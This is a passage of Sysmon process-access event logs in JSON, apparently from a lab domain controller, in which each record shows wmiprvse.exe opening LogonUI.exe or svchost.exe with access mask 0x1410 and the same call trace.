{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5276,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2B40000}\r\nTargetProcessId: 1096\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2B40000}","TargetProcessId":"1096","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5277,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001014B90000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001014B90000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5278,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5279,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010BCC20000}\r\nTargetProcessId: 1216\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010BCC20000}","TargetProcessId":"1216","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5280,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010C2C20000}\r\nTargetProcessId: 1220\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010C2C20000}","TargetProcessId":"1220","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5281,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-00103ECD0000}\r\nTargetProcessId: 1304\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-00103ECD0000}","TargetProcessId":"1304","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5282,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 